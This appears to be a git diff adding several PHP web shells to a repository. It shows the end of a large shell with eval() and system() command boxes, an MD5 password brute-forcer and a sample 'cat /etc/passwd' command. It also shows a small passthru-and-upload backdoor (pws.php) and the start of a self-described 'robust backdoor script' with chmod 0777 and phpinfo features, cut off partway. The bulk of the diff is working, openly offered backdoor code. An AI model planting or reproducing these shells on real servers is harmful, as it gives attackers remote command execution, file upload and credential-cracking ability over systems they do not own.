+<input type=submit></form>
+<P>";
+
+   if (!isset($shell)) $skipshell=1;
+
+   if (!isset($skipphp)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      if ($pre<>'') echo "<pre>";
+      if ($xmp<>'') echo "<xmp>";
+      if ($nlbr<>'' || $htmls<>'') {
+         ob_start();
+      }
+      if ($phpeval_access) eval($php);
+      else die("Sorry, function eval() disabled.");
+      if ($nlbr<>'' || $htmls<>'') {
+         $tmp=ob_get_contents();
+         ob_end_clean(); 
+         if ($htmls<>'') $tmp=htmlspecialchars($tmp);
+         if ($nlbr<>'') $tmp=nl2br($tmp);
+         echo $tmp;
+      }
+      if ($xmp<>'') echo "</xmp>";
+      if ($pre<>'') echo "</pre>";
+      echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      echo "</table></table></table></table></table></table></table></table></table></center></table><hr size=1 noshade>";
+   }
+
+   if (!isset($shell)) {
+      $shell="#".mm("example (remove comments '#')").": \n\n#cat /etc/passwd;\n\n#ps -ax\n\n#uname -a";
+      $skipshell=1;
+   }
+   echo "<P><b>".mm("Shell commands")."</b>
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=shell rows=".(!isset($skipshell)?10:4)." cols=60 style='width:100%;'>$shell</textarea><br>
+<input type=submit></form>
+<P>";
+   if (!isset($skipshell)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
+      if ($system_access) system($shell);
+      else die("Sorry, function system() disabled.");
+      echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
+      </table></table></table></table></table></table></table></table></table></center><hr size=1 noshade>";
+   }
+
+
+  $ttype=array(1=>"MD5",7=>"Decode MD5 (password crack)<br>",
+  2=>"Base64",3=>"Base64 + chunk",4=>"Base64 + chunk + quotes",
+  5=>"Decode Base64<br>",
+  6=>"UnixTime=>Date(".time().")",
+  8=>"MKtime: YYYY MM DD [hh [mm [ss]]]<br>",
+  9=>"Translit=&gt;RusText", 14=>"RusText=&gt;Translit<br>",
+  10=>"cp1251=&gt;koi8r",11=>"koi8r=&gt;cp1251",12=>"cp1251=&gt;mac",13=>"mac=&gt;cp1251",
+  15=>"koi8r=&gt;mac",16=>"mac=&gt;koi8r",
+  );
+  echo "<P><b>".mm("Universal convert")."</b>";
+
+  echo "<a name=convert></a><form action='$self#convert' method=post>";
+  foreach ($ttype as $k=>$v) 
+     echo "&nbsp;&nbsp;<nobr><input ".($k==$name?"checked":"")." type=radio name=name value=$k id=x$k><label for=x$k>$v</label></nobr> ";
+
+  echo "
+<input type=hidden name=c value=t>
+<textarea name=convert rows=".(isset($convert)?10:3)." cols=60 style='width:100%;'>".htmlspecialchars($convert)."</textarea><br>
+<input type=submit><br>";
+
+   
+   $russtr1="JCUKENGZH_FYVAPROLDESMIT_Bjcukengzh_fyvaproldesmit_b";
+   $russtr2="ÉÖÓÊÅÍÃÇÕÚÔÛÂÀÏĞÎËÄİÑÌÈÒÜÁéöóêåíãçõúôûâàïğîëäıñìèòüá";
+   function from_translit($ss) {
+      global $russtr1,$russtr2;
+      $w=array("Sch",'Ù',"SCH",'Ù',"ScH",'Ù',"SCh",'Ù',"sch",'ù',"Jo",'¨',"JO",'¨',"jo",'¸',
+      "Zh",'Æ',"ZH",'Æ',"zh",'æ',"Ch",'×',"CH",'×',"ch",'÷',"Sh",'Ø',"SH",'Ø',"sh",'ø',
+      "##",'Ú',"''",'Ü',"Eh",'İ',"EH",'İ',"eh",'ı',"Ju",'Ş',"JU",'Ş',"ju",'ş',"Yu",'Ş',
+      "YU",'Ş',"yu",'ş',"YA","ß","Ya","ß","ya","ÿ","Ja",'ß',"JA",'ß',"ja",'ÿ');
+      $c=count($w);
+      for ($i=0; $i<$c; $i+=2) $ss=str_replace($w[$i],$w[$i+1],$ss);
+      $ss=strtr($ss,$russtr1,$russtr2);
+      $ss=preg_replace("!([à-ÿ]+)~([à-ÿ]+)!is","\\1\\2",$ss);
+      return $ss;
+   }
+   function to_translit($ss) {
+      global $russtr1,$russtr2;
+      $ss=strtr($ss,$russtr2,$russtr1);
+      $ss=str_replace(
+         array('Ø', 'Ù',  'Æ', 'ß', '×', 'Ş', '¨', 'ø', 'ù',  'æ', 'ÿ', '÷', 'ş', '¸', ),
+         array('SH','SCH','ZH','YA','CH','YU','YO','sh','sch','zh','ya','ch','yu','yo',),
+         $ss);
+      return $ss;
+   }
+   
+   if (isset($convert)) {
+      if (!isset($name)) $name="0";
+      $out="";
+      switch ($name) {
+
+         case 1: 
+            $out=md5($convert);
+            break;
+
+         case 2:
+            $out=base64_encode($convert);
+            break;
+
+         case 3:
+            $out=chunk_split(base64_encode($convert));
+            break;
+
+         case 4:
+            $out=base64_encode($convert);
+            $out=substr(preg_replace("!.{1,76}!","'\\0'.\n",$out),0,-2);
+            break;
+
+         case 5:
+            $out=base64_decode($convert);
+            break;
+
+         case 6:
+            $convert=intval($convert);
+            if ($convert==0) $convert=time();
+            $out="Unixtime=$convert\n---Day/Month/Year--\n".
+               date("d/m/Y H:i:s",$convert)."\n".
+               date("d-m-Y H:i:s",$convert)."\n".
+               date("d.m.Y H:i:s",$convert)."\n".
+             "---Month/Day/Year--\n".
+               date("m/d/Y H:i:s",$convert)."\n".
+               date("m-d-Y H:i:s",$convert)."\n".
+               date("m.d.Y H:i:s",$convert)."\n".
+             "---------SQL-------\n".
+               date("Y-m-d H:i:s",$convert)."\n".
+               date("Y m d H i s",$convert)."\n".
+               date("YmdHis",$convert);
+            break;
+
+         case 8:
+            $c=explode(" ",trim(preg_replace("! +!"," ",$convert)));
+            if (count($c)<3 || count($c)>6) $out="Bad value. Type: 2000 12 31 or 2000 12 31 12 59 59";
+            else {
+               if (empty($c[0])) $c[0]=1970;
+               if ($c[0]<50) $c[0]=2000+$c[0];
+               if ($c[0]>50 && $c[0]<100) $c[0]=1900+$c[0];
+               if (empty($c[1])) $c[1]=1;
+               if (empty($c[2])) $c[2]=1;
+               if (empty($c[3])) $c[3]=0;
+               if (empty($c[4])) $c[4]=0;
+               if (empty($c[5])) $c[5]=0;
+               $out="TIME: $c[0]-$c[1]-$c[2] $c[3]:$c[4]:$c[5]\nMKTIME: ".mktime($c[3],$c[4],$c[5],$c[1],$c[2],$c[0]);
+            }
+            break;
+
+         case 9:
+            $out=from_translit($convert);
+            break;
+
+         case 14:
+            $out=to_translit($convert);
+            break;
+
+         case 10: $out=convert_cyr_string($convert,'w','k'); break;
+         case 11: $out=convert_cyr_string($convert,'k','w'); break;
+         case 12: $out=convert_cyr_string($convert,'w','m'); break;
+         case 13: $out=convert_cyr_string($convert,'m','w'); break;
+         case 15: $out=convert_cyr_string($convert,'k','m'); break;
+         case 16: $out=convert_cyr_string($convert,'m','k'); break;
+
+         case 7:
+            echo "<script>top.location.href='$self?c=md5crack&text=$convert'</script>";
+            break;
+
+         case 0:
+            $out="Please select anythink function in list. Example: type 'test' and select 'md5'. Then click 'Submit'.";
+            break;
+
+         default: 
+            $out='Sorry, this function not work (try new versions)';
+      }
+      echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<pre><xmp>$out</xmp></pre>\n\n\n\n\n\n\n\n\n<hr size=1 noshade>";
+   }
+   
+   break;
+
+
+case "md5crack":
+
+   echo "<form action=$self name=main><input type=hidden name=c value=md5crack>
+   <h2>Decode MD5 (<a href=$self>home</a>|<a href=$self?c=t&name=1#convert>md5</a>)</h2><P>";
+
+   if (!isset($go)) {
+      if (!isset($fullqty)) $fullqty="";
+      if (!isset($fulltime)) $fulltime="";
+      if (!isset($php)) $php="";
+      if (!isset($from)) $from="";
+      echo "<b>STRING</b>: <input type=text name=text value='$text' size=40> (only 32 char: 0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f)";
+      echo "<P><b>Range</b>: <input type=text name=php value=\"".htmlspecialchars($php)."\" size=90><br>";
+      $chars=array(
+      'a-z'=>"abcdefghijklmnopqrstuvwxyz",
+      'a-z,A-Z'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",
+      'a-z,0-9'=>"abcdefghijklmnopqrstuvwxyz0123456789",
+      'a-z,A-Z,0-9'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
+      'a-z,A-Z,0-9,other'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~`!@#\$%^&*()_+-=[]{};:,<.>/\"'\\");
+      $i=0;
+      foreach ($chars as $k=>$v) {
+         echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\",$v))."\"</script>
+         <a href='' onclick=\"document.main.php.value=str$i;return false\">$k</a> &nbsp; ";
+         $i++;
+      }
+      echo "<P>
+      <b>Start from</b>: <input type=text size=70 name=from value='$from'><P>
+      <input type=hidden name=go value=1>
+      <input type=hidden name=fullqty value=$fullqty>
+      <input type=hidden name=fulltime value=$fulltime>
+      <input type=submit value='Start!'><form>";
+   }
+   else {
+
+      function mdgetword() {
+         global $php,$from,$word;
+         $word="";
+         for ($i=0; $i<count($from); $i++) $word.=$php[$from[$i]];
+      }
+
+      $fulltime=@intval($fulltime);
+      $fullqty=@intval($fullqty);
+
+      $text=strtolower($text);
+      if (!preg_match("!^[0-9a-f]{32}$!",$text)) exit("md5 bad format: must be 32 bytes, range 0-9,a,b,c,d,e,f");
+      if (!isset($php) || strlen($php)==0) $php="qwertyuiopasdfghjklzxcvbnm";
+      if (!isset($from) || !preg_match("!^([0-9]+):(([0-9]+,)*[0-9]+)$!",$from,$ok)) {
+         $pos=0;
+         $from=0;
+      }
+      else {
+         $pos=$ok[1];
+         $from=$ok[2];
+      }
+      $from=explode(",",$from);
+      if (!is_array($from) || !count($from) || count($from)==1 && $from[0]==0) { 
+         $from=array(0);
+         if (md5("")===$text) exit("** DONE **<br><br>md5('')=$text<br><br>(try empty string, 0 bytes!)");
+      }
+      $phplen=strlen($php);
+      mdgetword();
+      $poslen=strlen($word);
+      if ($pos<0 || $pos>=$poslen) $pos=0;
+
+      for ($i=0; $i<10; $i++) { echo "<!-- -->\r\n"; flush(); }
+
+      echo "<h3><a href='$self?c=md5crack".
+         "&from=".urlencode("$pos:".implode(",",$from)).
+         "&text=".urlencode($text).
+         "&php=".urlencode($php).
+         "&fulltime=$fulltime&fullqty=$fullqty".
+         "'>Save this link</a> - click for break and save current position</h3>";
+      flush();
+
+      echo "
+      MD5_HASH=$text<br>
+      CURRENT_WORD=$word<br>
+      CURRENT_DIGIT=$pos:".implode(",",$from)."<br>
+      RANGE=".htmlspecialchars($php)."<br>
+      ProcessTime=$fulltime sec (".(floor($fulltime/60/60))."h)<br>
+      Calculation(qty)={$fullqty}0000<p><font face=courier>";
+      flush();
+
+
+      $fullsum=pow($phplen,$poslen);
+      $time1=time();
+      $i=0;
+
+      while (1) {
+
+         $i++;
+         if ($i>50000) {
+            $time=time()-$time1;
+            if ($time>20) break;
+            $i=0;
+            $sum=0;
+            for ($j=1; $j<count($from); $j++) $sum+=$from[$j]*pow($phplen,$j);
+            printf("<nobr><b>%02.2f%%</b> ($word) %02dsec |</nobr> \r\n",
+               $sum*100/$fullsum,$time);
+            flush();
+            $fullqty+=5;
+         }
+
+         if (md5($word)===$text) 
+            exit("<P><font color=red size=+1><b>** DONE **<P><tt>[$word]=[$text]</tt></b></font>
+            <script> window.focus();  window.focus(); setTimeout(\"alert('Done!')\",100);</script>");
+         $from[$pos]++;
+         if ($from[$pos]==$phplen) {
+            $flag=1;
+            $from[$pos]=0;
+            $word[$pos]=$php[0];
+            for ($pos=$pos+1; $pos<$poslen; $pos++) {
+               if ($from[$pos]+1<$phplen) {
+                  $from[$pos]++;
+                  $word[$pos]=$php[$from[$pos]];
+                  $flag=0;
+                  $pos=0;
+                  break;
+               }
+               else {
+                  $from[$pos]=0;
+                  $word[$pos]=$php[0];
+               }
+            }
+            if ($flag) {
+               $from[]=0;
+               $poslen=count($from);
+               $word.=$php[0];
+               $pos=0;
+               $fullsum=pow($phplen,$poslen);
+            }
+         }
+         $word[$pos]=$php[$from[$pos]];
+      }
+
+      $fulltime+=time()-$time1;
+      if ($i>5000) $fullqty++;
+      $url="$self?c=md5crack".
+           "&from=".urlencode("$pos:".implode(",",$from)).
+           "&text=".urlencode($text).
+           "&php=".urlencode($php).
+           "&fulltime=$fulltime&fullqty=$fullqty&go=1";
+      echo "<script>location.href=\"$url\"</script><a href='$url'>click here</a>";
+
+   }
+
+   break;
+
+
+case "phpinfo":
+
+   phpinfo();
+   break;
+
+
+case "codes":
+
+   error_reporting(2039);
+   if (!isset($limit)) $limit=999;
+   if (!isset($fontsize)) $fontsize="300%";
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+   echo "<h3>".mm("Character map (symbol codes table)")."</h3>
+   <form action=$self method=get>
+   <input type=hidden name=c value=\"codes\">
+   <select name=fontname size=1>
+   <option value='Webdings'>====[ ".mm("Select font")." ]====";
+
+   foreach (array('Arial','Courier','Comic Sans MS','Fixedsys','Small fonts','Symbol',
+      'System','Tahoma','Terminal','Times New Roman','Verdana',
+      'Webdings','Wingdings','Wingdings 2','Wingdings 3') as $v)
+      echo "<option".($fontname==$v?" selected":"").">$v";
+   
+   echo "</select>
+   ".mm("or type other")." 
+   <input size=13 type=text name=fontname2 value=\"$fontname2\">.
+   ".mm("Font size").": <input size=6 type=text name=fontsize value=\"$fontsize\">.<br>
+   ".mm("Code limit").": 
+   <input type=radio name=limit value=255 id=a1 ".($limit==255?"checked":"")."><label for=a1>0-255</label>
+   <input type=radio name=limit value=999 id=a2 ".($limit==999?"checked":"")."><label for=a2>0-999 </label>
+   <input type=radio name=limit value=9999 id=a3 ".($limit==9999?"checked":"")."><label for=a3>0-9999</label>
+   <input type=submit value='".mm("Generate table")." !'></form><P>";
+
+   if (!isset($fontname)) break; 
+   if (!empty($fontname2)) $fontname=$fontname2;
+   echo "
+   <STYLE>
+   .codes { font: $fontsize $fontname; text-align: center; }
+   .z { font: 12pt Fixedsys; color: #cccccc; }
+   </STYLE>
+   <table class=codes border=0 cellspacing=0 cellpadding=1>";
+   ?>
+   <SCRIPT>
+   m=8;
+   n=1;
+   s=new String("");
+   s=s+"<tr><td class=z>&amp;#0000;</td><td>&nbsp;</td>";
+   for (i=1; i<=<?php echo $limit; ?>; i++) {
+      if (i<10) x="000"+i;
+      else if (i<100) x="00"+i;
+           else if (i<1000) x="0"+i;
+                else x=i;
+      if (n%m==0) s=s+"<tr>";
+      s=s+"<td class=z>&amp;#"+x+";</td>";
+      s=s+"<td>&#"+x+";</td>";
+      if (n%m+1==m) s=s+"</tr>";
+      if (s.length>500) {
+         document.write(s);
+         s=""
+      } 
+      n++;
+   }
+   document.write(s);
+   </SCRIPT>
+   <?php
+
+   echo "</table>";
+   break;
+
+
+
+case "img":
+
+   unset($img);
+$img=array(
+'dir'=>
+'R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp'.
+'/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=',
+'fon'=>
+'R0lGODlhQAYEALMAAAAAAP///6bK8A4obRs2eSlFhDZTkEVjnVRyqWKCtnCQwXyezIiq1pO24J3A'.
+'6P///yH5BAEAAA8ALAAAAABABgQAAAT/cMhJq704E7n78EQXjmRpnmcRqizRsgUcz3Rt37QR63zR'.
+'GzygcEgsGo8HYNKQbDKfh2Z0Sq1ar9goQsvdeg/eMGJMLpvPaHRivG4j3O14Yk6v2+/4u2K+7yf8'.
+'Cn2Bg4SFhoeGC4GKjAqNC4yQkpOUlZaTDJCZmwubngygoaKjpKUNDKepqKipDa6vsLGysg4Ntbe2'.
+'tg63u72+v8AOArvDxcLFAsnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx'.
+'8vPSGfb3GCAfHBP6IvwgRKBIscJFwREvXMRYkVCGQhw1dPiYSJHiDx8SLwLBeKSjkyUg/5VAGRnl'.
+'CUkmWVKCWfmF5UqXX8bAZJmmJpubbt6QWaNzTs+ccOTkwbPnj9GjfIwCKspUqSBEiRxJnbpI6qNG'.
+'Vh1d2sopUydNYEF18tp1bClTq06JUqvK1aq0rGbNwvUKl11deIP9Mkasr7Fkwo4do0e4sOHDiBMr'.
+'Xsy4sePHkCNLnkzZHL7LmC9s2LdZ34eAAkOjUGGCNAyEBhkqfDiDNcTXGS1O7IFx9sYhHDuKRCIy'.
+'pBSSUqgAV7kFS/GXMcHIXK6cDEybOm+e4emzp/Wgdd7E0T50aNNAdADxeTroT3moVQspWrT+0dRI'.
+'k7Ju/VrJK/2ynsyG+nr2LSlVrMCVlsIsA8pVCyx05bJLXrzoFQxff0WITGUUVmjhhRhmqOGGHHbo'.
+'4YcgepPZiP3wA9A+nJ0o0GchsDjQiwaRFiNCL7R2Wo2vRZRDRbJpdJsQueWm2xImfdTbbkYKNwUU'.
+'KjXp0pPMJScGTdBVeZ10V2J3XXdEJaWUHUWZ9yV4ZDqFHnrrZVWVe5VYNZ8l9pF1H3/87ddVf6Oo'.
+'JSCAcMHSp1wGKujKXQsGo8uDvgwTWGCKKjMYYCFGKumklFZq6aWYZqrppstEAAA7',
+'mode'=>
+'R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO'.
+'2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/'.
+'dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=',
+
+'refresh'=>
+'R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA'.
+'AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY'.
+'3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ'.
+'R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=',
+'search'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//'.
+'/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap'.
+'s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD'.
+'AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr'.
+'Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==',
+'setup'=>
+'R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC'.
+'QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA'.
+'ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB'.
+'qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE'.
+'OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==',
+'up'=>
+'R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg'.
+'+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV'.
+'IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==',
+'sort_asc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa'.
+'SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==',
+'sort_desc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb'.
+'SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=',
+'exe'=>
+'R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7'.
+'WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt'.
+'xhIAOw==',
+'html'=>
+'R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz'.
+'c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P'.
+'KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk'.
+'Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR'.
+'ADs=',
+'txt'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ'.
+'SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7'.
+'UpPWG3Ig6Hq/XmRjuZwkAAA7',
+'unk'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANE'.
+'SLPcSzCqQKsVQ8JhexBBJnGVYFZACowleJZrRH7lFW8eDbMXaPO1juA2uXiGwBwFKRMeiTPlByrd'.
+'yUzYbJao6npVkQQAOw==',
+'php'=>
+'R0lGODlhEwAQALMAAAAAAP///9fX3d3f7s/S5F1qpmJpjKOqyr7D27i80K+ywEtam4OIk+T/AO7u'.
+'7v///yH5BAEAAA8ALAAAAAATABAAAAR08D0wK71VSna47yBHadxhnujRqKRJvC+SJIPKbgJR7DzP'.
+'NECNgNFbGI/HhmZQWASezugzsFBKdtJsoEA1aLBTJzTMIDWpRqr6mFgyounswiAgDYjY/FwxGD1K'.
+'BAMIg4MJCg41fiUpjAeKjY1+EwCUlZaVGhEAOw==',
+'img'=>
+'R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV'.
+'Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp'.
+'qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq'.
+'BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==',
+'edit'=>
+'R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze'.
+'EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61'.
+'LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==',
+'papki'=>
+'R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo'.
+'eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD'.
+'Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==',
+'home'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS'.
+'krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j'.
+'VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=',
+'back'=>
+'R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8'.
+'aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt'.
+'Wg0JADs='
+
+);
+
+
+   header("Content-type: image/gif");
+   header("Cache-control: public");
+   // /*
+   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+   header("Cache-control: max-age=".(60*60*24*7));
+   header("Last-Modified: ".date("r",filemtime(__FILE__)));
+   // */
+   echo base64_decode($img[$name]);
+
+   break;
+
+}
+
+
+?>
\ No newline at end of file
diff --git a/php/pws.php b/php/pws.php
new file mode 100644
index 0000000..cf979a1
--- /dev/null
+++ b/php/pws.php
@@ -0,0 +1,35 @@
+<html>
+<head>
+<div align="left"><font size="1">Input command :</font></div>
+<form name="cmd" method="POST" enctype="multipart/form-data">
+<input type="text" name="cmd" size="30" class="input"><br>
+<pre>
+<?php
+if ($_POST['cmd']){
+$cmd = $_POST['cmd'];
+passthru($cmd);
+}
+?>
+</pre>
+<hr>
+<div align="left"><font size="1">Uploader file :</font></div>
+
+<?php
+$uploaded = $_FILES['file']['tmp_name'];
+if (file_exists($uploaded)) {
+   $pwddir = $_POST['dir'];
+   $real = $_FILES['file']['name'];
+   $dez = $pwddir."/".$real;
+   copy($uploaded, $dez);
+   echo "FILE UPLOADED TO $dez";
+}
+?>     </pre>
+<form name="form1" method="post" enctype="multipart/form-data">
+ <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
+ <input type="submit" name="submit2" value="Upload">
+ <input type="file" name="file" size="15">
+	  </td>
+    </tr>
+</table>
+</body>
+</html>
diff --git a/php/qsd-php-backdoor.php b/php/qsd-php-backdoor.php
new file mode 100644
index 0000000..93f36fa
--- /dev/null
+++ b/php/qsd-php-backdoor.php
@@ -0,0 +1,429 @@
+<?php
+// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.com/ [3-15-2011]
+// This code is public domain and may be used in part or in full for any legal purpose. I would still appreciate a mention though :).
+
+function isLinux($path)
+{
+    return (substr($path,0,1)=="/" ? true : false);
+}
+function getSlashDir($isLinux)
+{
+    return($isLinux ? '/' : '\\');
+}
+//See if we are on Linux or Windows becuase the paths have to be processed differently
+$cwd=getcwd();
+$isLinux=isLinux($cwd);
+if(!$isLinux)
+{
+    $driveLetter=substr($cwd,0,1);
+}
+$slash=getSlashDir($isLinux);
+$parts=explode($slash,$cwd);
+$rootDir=($isLinux ? $slash : ($driveLetter . ':' . $slash));
+
+function cleanPath($path,$isLinux)
+{
+    $slash=getSlashDir($isLinux);
+    $parts=explode($slash,$path);
+    foreach($parts as $key=>$val)//Process .. directories and a single .
+    {
+        if($val=="..")
+        {
+            $parts[$key]="";
+            $lastKey=$key-1;
+            $parts[$lastKey]="";
+        }
+        elseif($val==".")
+        {
+            $parts[$key]="";
+        }
+    }
+    reset($parts);
+    $fixedPath=($isLinux ? "/" : "");//Some PHP configs wont automatically create a variable on .= or will at least whine about it
+    $firstPiece=true;
+    foreach($parts as $val)//Assemble the path back together
+    {
+        if($val != "")
+        {
+            $fixedPath .=  ($firstPiece ? '' : $slash) . $val;
+            $firstPiece=false;
+        }
+    }
+    if($fixedPath=="")//If we took out the entire path go to bottom level to avoid an error
+    {
+        $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash));
+    }
+    
+    //Make sure there is an ending slash
+    if(substr($fixedPath,-1)!=$slash)
+        $fixedPath .= $slash;
+    return $fixedPath;
+}
+if(isset($_REQUEST['chm']))
+{
+    if(!$isLinux)
+    {
+        echo "This feature only works on Linux";
+    }
+    else
+    {
+        echo (@chmod ( $_REQUEST['chm'] , 0777 ) ? "Reassigned" : "Can't Reasign");
+    }
+}
+elseif(isset($_REQUEST['phpinfo']))
+{
+    phpinfo();
+}
